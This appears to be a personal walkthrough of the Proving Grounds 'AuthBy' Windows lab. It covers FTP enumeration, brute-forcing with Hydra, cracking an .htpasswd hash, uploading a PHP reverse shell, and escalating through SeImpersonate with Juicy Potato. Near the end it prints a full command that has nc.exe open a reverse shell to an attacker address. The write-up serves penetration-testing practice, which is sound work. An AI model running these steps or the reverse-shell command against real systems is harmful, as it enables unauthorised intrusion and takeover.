AuthBy
Last updated
Last updated
Source: Proving Grounds OS: Windows Community Rating: Hard
I started with the usual autorecon, which revealed the following open ports:
FTP (21)
HTTP (242)
3145, 3389
FTP allowed anonymous login, so I began there. Although I could only list directories and not download files, I noticed an "accounts" folder containing usernames:
offsec
admin
anonymous
The HTTP service, however, required credentials to proceed.
I used Hydra with the -e nsr flag to bruteforce the accounts. The admin account worked with the password "admin." While the admin credentials didn’t work on the HTTP site, they did grant access to FTP. Using the command: wget -r ftp://admin:admin@192.168.118.46
I downloaded the FTP files. After some digging and going in circles, I discovered a hidden file that I hadn't initially noticed, .htpasswd, which contained a hashed password for offsec. Running John against it, I cracked the hash, the password turned out to be "elite".
Now with offsec credentials, I logged into the HTTP server and noticed that the index.html there was identical to the one on the FTP server. This indicated that I could upload a shell via FTP (using the admin account) and then access it on HTTP with the offsec account. I created a PHP shell, after trying pentestmonkey’s version, which would connect briefly then crash, I switched to Ivan Sincek’s PHP shell, and it finally worked. I was in.
Running whoami /priv revealed that I had the SeImpersonatePrivilege privilege.
I checked system info to determine whether the server was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil to download the necessary files:
After uploading both nc and Juicy Potato, I tried running Juicy Potato with the default CLSID—it didn’t work at first, so I tested with different ones until one succeeded: .\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
FTP Enumeration: Even with anonymous login, checking directories (like “accounts”) can reveal valid usernames.
Brute Force is Key: Using Hydra with the proper flags can uncover weak credentials quickly.
Hidden Files Matter: Don’t overlook hidden files on FTP servers—.htpasswd provided the offsec password here.
File Transfer Tools: Using wget -r to download all FTP files can save a lot of time.
Shell Stability: If one PHP shell doesn’t work (like pentestmonkey’s), try alternatives until you get a stable connection.
Windows Nuances: Remember that on Windows, commands are executed with .\ rather than ./, and rlwrap can improve shell usability with nc.
Certutil for File Uploads: Certutil is a useful tool for transferring files, as demonstrated when downloading Juicy Potato and nc.
Privilege Escalation with Juicy Potato: Leveraging SeImpersonate privileges through Juicy Potato can be a gate for Windows privilege escalation.
